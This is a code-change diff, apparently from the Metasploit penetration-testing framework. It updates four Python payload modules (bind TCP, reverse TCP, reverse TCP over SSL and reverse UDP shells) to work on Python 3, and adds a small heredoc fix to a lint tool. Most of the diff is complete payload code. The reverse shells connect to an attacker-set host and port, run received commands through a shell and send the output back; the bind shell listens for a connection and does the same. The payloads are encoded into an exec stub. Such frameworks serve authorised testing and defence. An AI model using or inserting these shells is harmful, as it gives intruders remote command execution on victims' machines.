fix #14207, fix python/shell_reverse_tcp on python3

modules/payloads/singles/python/shell_bind_tcp.rb

@@ -5,15 +5,16 @@
 
 module MetasploitModule
 
-  CachedSize = 381
+  CachedSize = 481
 
   include Msf::Payload::Single
+  include Msf::Payload::Python
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
     super(merge_info(info,
       'Name' => 'Command Shell, Bind TCP (via python)',
-      'Description' => 'Creates an interactive shell via python, encodes with base64 by design',
+      'Description' => 'Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.',
       'Author' => 'mumbai',
       'License' => MSF_LICENSE,
       'Platform' => 'python',
@@ -34,23 +35,22 @@ def generate
   end
 
   def command_string
-    cmd = ''
-    dead = Rex::Text.rand_text_alpha(2)
-    # Set up the socket
-    cmd << "import socket,os\n"
-    cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
-    cmd << "so.bind(('#{datastore['RHOST']}',#{ datastore['LPORT']}))\n"
-    cmd << "so.listen(1)\n"
-    cmd << "so,addr=so.accept()\n"
-    cmd << "#{dead}=False\n"
-    cmd << "while not #{dead}:\n"
-    cmd << "\tdata=so.recv(1024)\n"
-    cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
-    cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
-    cmd << "\tso.send(stdout_value)\n"
+    cmd = <<~PYTHON
+      import socket as s
+      import subprocess as r
+      so=s.socket(s.AF_INET,s.SOCK_STREAM)
+      so.bind(('#{datastore['RHOST']}',#{ datastore['LPORT']}))
+      so.listen(1)
+      so,addr=so.accept()
+      while True:
+      	d=so.recv(1024)
+      	if len(d)==0:
+      		break
+      	p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+      	o=p.stdout.read()+p.stderr.read()
+      	so.send(o)
+    PYTHON
 
-   # base64
-   cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
-   cmd
+    py_create_exec_stub(cmd)
  end
 end

modules/payloads/singles/python/shell_reverse_tcp.rb

@@ -9,15 +9,16 @@
 
 module MetasploitModule
 
-  CachedSize = 401
+  CachedSize = 461
 
   include Msf::Payload::Single
+  include Msf::Payload::Python
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
     super(merge_info(info,
       'Name'          => 'Command Shell, Reverse TCP (via python)',
-      'Description'   => 'Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.3.3',
+      'Description'   => 'Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.',
       'Author'        => 'Ben Campbell', # Based on RageLtMan's reverse_ssl
       'License'       => MSF_LICENSE,
       'Platform'      => 'python',
@@ -44,25 +45,21 @@ def generate
   # Returns the command string to use for execution
   #
   def command_string
-    cmd = ''
-    dead = Rex::Text.rand_text_alpha(2)
-    # Set up the socket
-    cmd << "import socket,os\n"
-    cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
-    cmd << "so.connect(('#{datastore['LHOST']}',#{ datastore['LPORT']}))\n"
-    # The actual IO
-    cmd << "#{dead}=False\n"
-    cmd << "while not #{dead}:\n"
-    cmd << "\tdata=so.recv(1024)\n"
-    cmd << "\tif len(data)==0:\n\t\t#{dead}=True\n"
-    cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
-    cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
-    cmd << "\tso.send(stdout_value)\n"
+    cmd = <<~PYTHON
+      import socket as s
+      import subprocess as r
+      so=s.socket(s.AF_INET,s.SOCK_STREAM)
+      so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))
+      while True:
+      	d=so.recv(1024)
+      	if len(d)==0:
+      		break
+      	p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+      	o=p.stdout.read()+p.stderr.read()
+      	so.send(o)
+    PYTHON
 
-    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
-
-    cmd
+    py_create_exec_stub(cmd)
   end
 end
 

modules/payloads/singles/python/shell_reverse_tcp_ssl.rb

@@ -9,15 +9,16 @@
 
 module MetasploitModule
 
-  CachedSize = 561
+  CachedSize = 509
 
   include Msf::Payload::Single
+  include Msf::Payload::Python
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
     super(merge_info(info,
       'Name'          => 'Command Shell, Reverse TCP SSL (via python)',
-      'Description'   => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
+      'Description'   => 'Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.',
       'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
       'License'       => BSD_LICENSE,
       'Platform'      => 'python',
@@ -44,26 +45,23 @@ def generate
   # Returns the command string to use for execution
   #
   def command_string
-    cmd = ''
-    dead = Rex::Text.rand_text_alpha(2)
-    # Set up the socket
-    cmd += "import socket,subprocess,os,ssl\n"
-    cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
-    cmd += "so.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
-    cmd += "s=ssl.wrap_socket(so)\n"
-    # The actual IO
-    cmd += "#{dead}=False\n"
-    cmd += "while not #{dead}:\n"
-    cmd += "\tdata=s.recv(1024)\n"
-    cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n"
-    cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
-    cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
-    cmd += "\ts.sendall(stdout_value)\n"
+    cmd = <<~PYTHON
+      import socket as s
+      import subprocess as r
+      import ssl
+      so=s.socket(s.AF_INET,s.SOCK_STREAM)
+      so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))
+      so=ssl.wrap_socket(so)
+      while True:
+      	d=so.recv(1024)
+      	if len(d)==0:
+      		break
+      	p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+      	o=p.stdout.read()+p.stderr.read()
+      	so.sendall(o)
+    PYTHON
 
-    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
-
-    cmd
+    py_create_exec_stub(cmd)
   end
 end
 

modules/payloads/singles/python/shell_reverse_udp.rb

@@ -9,15 +9,16 @@
 
 module MetasploitModule
 
-  CachedSize = 397
+  CachedSize = 453
 
   include Msf::Payload::Single
+  include Msf::Payload::Python
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
     super(merge_info(info,
       'Name'          => 'Command Shell, Reverse UDP (via python)',
-      'Description'   => 'Creates an interactive shell via python, encodes with base64 by design. Compatible with Python 2.3.3',
+      'Description'   => 'Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.',
       'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
       'License'       => MSF_LICENSE,
       'Platform'      => 'python',
@@ -44,25 +45,21 @@ def generate
   # Returns the command string to use for execution
   #
   def command_string
-    cmd = ''
-    dead = Rex::Text.rand_text_alpha(2)
-    # Set up the socket
-    cmd << "import socket,os\n"
-    cmd << "so=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n"
-    cmd << "so.connect(('#{datastore['LHOST']}',#{ datastore['LPORT']}))\n"
-    # The actual IO
-    cmd << "#{dead}=False\n"
-    cmd << "while not #{dead}:\n"
-    cmd << "\tdata=so.recv(1024)\n"
-    cmd << "\tif len(data)==0:\n\t\t#{dead}=True\n"
-    cmd << "\tstdin,stdout,stderr,=os.popen3(data)\n"
-    cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
-    cmd << "\tso.send(stdout_value)\n"
+    cmd = <<~PYTHON
+      import socket as s
+      import subprocess as r
+      so=s.socket(s.AF_INET,s.SOCK_DGRAM)
+      o=b''
+      while True:
+      	so.sendto(o,('#{datastore['LHOST']}',#{datastore['LPORT']}))
+      	d=so.recv(1024)
+      	if len(d)==0:
+      		break
+      	p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE)
+      	o=p.stdout.read()+p.stderr.read()
+    PYTHON
 
-    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
-
-    cmd
+    py_create_exec_stub(cmd)
   end
 
 end

tools/dev/msftidy.rb

@@ -538,6 +538,7 @@ def check_lines
     no_stdio   = true
     in_comment = false
     in_literal = false
+    in_heredoc = false
     src_ended  = false
     idx        = 0
 
@@ -557,6 +558,15 @@ def check_lines
       next if in_literal
       in_literal = true if ln =~ /\<\<-EOS$/
 
+      # heredoc string awareness (ignore indentation in these)
+      if in_heredoc
+        in_heredoc = false if ln =~ /\s#{in_heredoc}$/
+        next
+      end
+      if ln =~ /\<\<\~([A-Z]+)$/
+        in_heredoc = $1
+      end
+
       # ignore stuff after an __END__ line
       src_ended = true if ln =~ /^__END__$/
       next if src_ended